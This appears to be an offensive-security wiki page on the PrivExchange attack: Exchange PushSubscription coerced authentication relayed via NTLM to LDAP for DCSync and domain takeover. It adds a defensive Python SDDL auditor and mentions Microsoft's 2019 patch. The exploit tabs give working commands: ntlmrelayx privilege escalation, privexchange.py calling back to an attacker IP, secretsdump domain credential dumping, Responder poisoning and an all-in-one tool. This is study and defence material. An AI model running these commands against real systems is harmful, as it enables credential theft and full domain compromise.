# PrivExchange

## Theory

PrivExchange relies on [PushSubscription coerced authentication](https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/pushsubscription-abuse). PushSubscription is an Exchange Web Services (EWS) API that lets a client subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference): HTTP, unlike SMB, does not negotiate session signing, so the [Session Signing and MIC mitigations](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) do not get in the way.

As Exchange servers usually have high privileges in a domain (i.e. `WriteDacl`, see [Abusing ACLs](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference)), the coerced authentication can be relayed and abused to obtain domain admin privileges (see [NTLM Relay](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) and [Kerberos Unconstrained Delegations](https://red.infiltr8.io/ad/kerberos/delegations#unconstrained-delegations-kud)).

<figure><img src="https://329872044-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMdUKdzuqIuObdvCB3mUR%2Fuploads%2Fgit-blob-1b0b2fbb580ee5c31a195b082c3bc2d5a131e968%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Practice

{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved:

* the coerced authentication issue
* the excessive permissions held by Exchange servers, which allowed an attacker to fully compromise the domain.
{% endhint %}
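As an added defensive check (not part of the original page or of any tool it cites), the following Python parses an exported SDDL string of an AD object and flags allow ACEs that grant WriteDacl, WriteOwner or GenericAll to a watched set of SIDs, which lets you confirm that the Exchange security groups no longer hold such rights on the domain object after the update. The Exchange group SID, the object GUID and the sample descriptor are constructed placeholders; a real descriptor can be exported with `Get-Acl` or from the `nTSecurityDescriptor` attribute.

```python
"""Audit an AD object's SDDL for ACEs granting WriteDacl/WriteOwner/GenericAll to watched SIDs."""
import re

# Access-mask bits behind the SDDL two-letter rights codes this check cares about.
WRITE_DAC, WRITE_OWNER, GENERIC_ALL = 0x00040000, 0x00080000, 0x10000000
RIGHTS = {"WD": WRITE_DAC, "WO": WRITE_OWNER, "GA": GENERIC_ALL}
DANGEROUS = {"WriteDacl": WRITE_DAC, "WriteOwner": WRITE_OWNER, "GenericAll": GENERIC_ALL}

def parse_rights(field):
    """The rights field is either a hex mask or a run of two-letter codes (unknown codes ignored)."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS.get(field[i:i + 2], 0)
    return mask

def parse_dacl(sddl):
    """Return the DACL ACEs as dicts; owner (O:), group (G:) and SACL (S:) parts are skipped."""
    m = re.search(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        f = ace.split(";")  # type;flags;rights;object_guid;inherit_object_guid;sid
        aces.append({"type": f[0], "flags": f[1], "mask": parse_rights(f[2]), "sid": f[5]})
    return aces

def find_dangerous_aces(sddl, watched_sids):
    """Allow ACEs (A/OA) for a watched SID carrying any DANGEROUS bit, with the names of those bits."""
    hits = []
    for ace in parse_dacl(sddl):
        names = [name for name, bit in DANGEROUS.items() if ace["mask"] & bit]
        if ace["type"] in ("A", "OA") and ace["sid"] in watched_sids and names:
            hits.append({**ace, "rights": names})
    return hits

# Constructed sample: a pre-patch style domain descriptor where the Exchange group (constructed
# SID, RID 1125) holds full control next to Domain Admins (RID 512) and Authenticated Users (AU).
EXCHANGE_GROUP_SID = "S-1-5-21-1111111111-2222222222-3333333333-1125"
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;S-1-5-21-1111111111-2222222222-3333333333-512)"
    f"(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;{EXCHANGE_GROUP_SID})"
    f"(OA;CI;RP;11111111-2222-3333-4444-555555555555;;{EXCHANGE_GROUP_SID})"  # placeholder GUID
    "(A;;RPLCLORC;;;AU)"
    "S:(AU;SA;WDWOSDWPCC;;;WD)"
)

if __name__ == "__main__":
    for hit in find_dangerous_aces(SAMPLE_SDDL, {EXCHANGE_GROUP_SID}):
        print(f"ALERT {hit['sid']} holds {', '.join(hit['rights'])} (ACE type {hit['type']})")
```

A clean post-update descriptor yields no hits for the Exchange group SIDs; any hit is a permission to review.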

{% tabs %}
{% tab title="Exploit - with creds" %}
First, start the NTLM relay that will escalate privileges:

```bash
# NTLM relaying is used to relay the connection and grant DCSync privileges
ntlmrelayx.py -t ldap://$DC --escalate-user $USER_TO_ESCALATE
```

Using [PrivExchange](https://github.com/dirkjanm/privexchange/), we can log in to Exchange Web Services and call the API. The user must have a mailbox for the coerced authentication to work.

```bash
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
```

We can now dump domain credentials through DCSync:

```bash
secretsdump.py $DOMAIN/$USER_TO_ESCALATE@$DC -just-dc
```

{% endtab %}

{% tab title="Exploit - without creds" %}
If you don't have any credentials, it is still possible to [relay the authentication](https://red.infiltr8.io/ad/movement/exchange-services/broken-reference) of another user to make the API call. The [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) script from PrivExchange can be used with ntlmrelayx.py to perform this attack. It uses NTLM relaying together with LLMNR/NBT-NS poisoning to relay credentials captured on the network.

With the modified httpattack.py in place, ntlmrelayx performs the attack:

```bash
# Back up the httpattack.py shipped with impacket
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old

# Replace it with the PrivExchange version
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
# Edit the attacker_url parameter (the host to which Exchange will authenticate);
# double quotes let the shell expand $ATTACKER_URL, '|' is the sed delimiter since the URL contains '/'
sed -i "s|attacker_url = .*|attacker_url = \"$ATTACKER_URL\"|" httpattack.py

# Build the environment so ntlmrelayx picks up the modified attack module
cd /PATH/TO/impacket
virtualenv venv && source venv/bin/activate
pip install .

# Start the relay, targeting the Exchange Web Services endpoint
ntlmrelayx.py -t https://$EXCHANGE_SERVER/EWS/Exchange.asmx
```

We can now use LLMNR/NBT-NS/mDNS poisoning with Responder to capture credentials and relay them:

```bash
responder -i eth0
```

{% endtab %}

{% tab title="Exploit - Auto" %}
[Exchange2domain](https://github.com/Ridter/Exchange2domain) is an all-in-one tool for the PrivExchange exploit. It only needs to open the web server port, so no high privileges are required.

```bash
python2.7 Exchange2domain.py -ah attackerip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
```

{% endtab %}
{% endtabs %}

## References

{% embed url="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/" %}
